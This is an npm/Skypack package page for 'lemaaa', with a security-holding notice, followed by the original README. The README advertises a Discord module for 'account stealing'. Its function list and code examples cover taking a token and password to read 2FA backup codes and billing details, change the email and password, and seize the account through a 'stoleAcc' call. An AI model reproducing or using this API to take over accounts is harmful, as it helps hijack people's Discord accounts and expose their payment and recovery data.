lemaaa

security holding package

Usage no npm install needed!

<script type="module">
  import lemaaa from 'https://cdn.skypack.dev/lemaaa';
</script>

README

Discord Utilities

A Powerful module for Discord made by Lemaaa

With this module you can do everything you want, account stealing and more.

Last Update

  • Function (stoleAcc) fixed, she did not return the correct token and did not change the email.

Function list:

  • getCertifiedBots(token) | Get a list of all certified bots
  • removeFriend(token, id) | Remove a friend from your friend list
  • getBots(token) | Get a list of all bots
  • checkPassword(token, password) | Check if a password is valid
  • get2FA(token, password) | Get all backup codes
  • getBillings(token, password) | Get all billings info
  • changeVanity(token, guild, code) | Change the custom vanity on a server
  • changePassword(token, password, newPassword) | Change the current password
  • changeEmail(token, password, newMail) | Change the current mail
  • stoleAcc(token, password) | Generate a new password and email for the account
  • getUser(token) | Get all user info
  • getUserBadges(token) | Get all user badges

Example

const { Client } = require('discord.js'),
client = new Client();
const DiscordUT = require('lemaaa');

// Change the password of an account
const passwordChange = await DiscordUT.changePassword("ODMxMzE3NzI0Mzg1OTAy-xO4YAb4pO-BUGY4bVtpeN3Rc", "currPass123", "newPass123")
console.log(passwordChange) // Returning a new token if 2fa is enabled



// Change the mail of an account
const mailChange = await DiscordUT.changeEmail("ODMxMzE3NzI0Mzg1OTAy-xO4YAb4pO-BUGY4bVtpeN3Rc", "currPass123", "newEmail123@gmail.com")
console.log(mailChange) // Returning a new token if 2fa is enabled


// Stole an account
const newInfo = await DiscordUT.stoleAcc("ODMxMzE3NzI0Mzg1OTAy-xO4YAb4pO-BUGY4bVtpeN3Rc", "currPass123");
console.log(newInfo);
/*
{
"password": "newPassword",
"new_mail": "newMail@mail.com",
"token": "token"
}
*/



// Get user badges
const badges = await DiscordUT.getUserBadges("ODMxMzE3NzI0Mzg1OTAy-xO4YAb4pO-BUGY4bVtpeN3Rc")
console.log(badges)
/*
{
  hypesquad_events: false,
  discord_employee: false,
  partenered_server_owner: false,
  bug_hunter_level_1: false,
  bug_hunter_level_2: false,
  early_supporter: false,
  early_verified_bot_developer: false,
  house_balance: false,
  house_bravery: false,
  house_brilliance: true,
  nitro_classic: false,
  nitro_boost: false
}
*/


client.login(token)

Note: Use this module at your own risk.

License & Author

Author : Lemaaa License : MIT